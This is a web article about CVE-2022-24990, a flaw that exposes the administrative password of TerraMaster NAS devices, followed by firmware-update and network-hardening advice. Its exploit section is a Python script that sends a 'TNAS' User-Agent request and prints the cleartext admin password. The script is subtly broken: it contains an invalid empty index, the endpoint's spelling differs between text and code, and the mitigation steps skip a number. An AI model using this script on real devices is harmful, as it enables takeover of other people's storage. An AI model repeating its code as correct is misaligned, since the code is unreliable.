CVE-2022-24990 - TerraMaster NAS 4.2.29 and Earlier - Remote Administrative Password Discovery Exploit & Patch

TerraMaster's Network Attached Storage (NAS) systems are designed to help users easily store and access data. However, a critical vulnerability, CVE-2022-24990, was recently discovered in TerraMaster NAS 4.2.29 and earlier versions. This vulnerability allows remote attackers to discover the administrative password by sending a specific User-Agent in the HTTP request when requesting the module/api.php?mobile/webNasIPS endpoint. In this article, we'll dive into the details of the exploit, provide an example of the attack, and discuss how to mitigate the vulnerability.

For more information about the vulnerability, refer to its entry in the CVE List: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24990

Exploit Details

The vulnerability exists due to insufficient access control in the module/api.php script. An attacker can send a crafted HTTP request with the custom "User-Agent: TNAS" header to the target NAS device. The server will respond with an XML document containing the PWD field, which holds the administrative password in cleartext.

The following Python code demonstrates how the exploit works

import requests

target = "http://TARGET_IP"; # Replace TARGET_IP with the target's IP address
headers = {"User-Agent": "TNAS"}

# Send an HTTP request to the target NAS with the custom User-Agent
response = requests.get(f"{target}/module/api.php?mobile/webnasIPS", headers=headers)

# Check if the password was successfully retrieved
if response.status_code == 200:
    # Extract the administrative password from the response
    pwd = response.text.split("<PWD>")[1].split("</PWD>")[]
    print(f"Administrative Password: {pwd}")
else:
    print("Failed to retrieve the administrative password.")

Replace TARGET_IP with the IP address of the target NAS device and run the script. If the exploit is successful, the administrative password will be printed to the console.

Mitigation

To mitigate the vulnerability, TerraMaster has provided an updated firmware for their NAS devices, which includes a patch for this issue. Users are strongly encouraged to update their TerraMaster NAS devices to the latest firmware version by following these steps:

1. Visit TerraMaster's official support website: https://www.terra-master.com/support/firmware/

Download the appropriate firmware update for your NAS model.

3. Follow the firmware installation process as detailed in TerraMaster's user manual for your NAS model.

In addition to updating the firmware, users should exercise caution when exposing NAS devices to the internet. Implementing firewalls and internal network segmentation can further secure the NAS devices from attacks.

Conclusion

CVE-2022-24990 demonstrates the potential risks associated with network-attached storage devices. It is crucial to secure these devices by keeping the firmware up-to-date, implementing network security best practices, and monitoring the devices for signs of compromise. By doing so, users can greatly reduce the risk of unauthorized access and data loss.

Remember to always practice secure browsing and update your devices frequently to protect yourself from known vulnerabilities.

Timeline

Published on: 02/07/2023 18:15:00 UTC
Last modified on: 02/16/2023 14:24:00 UTC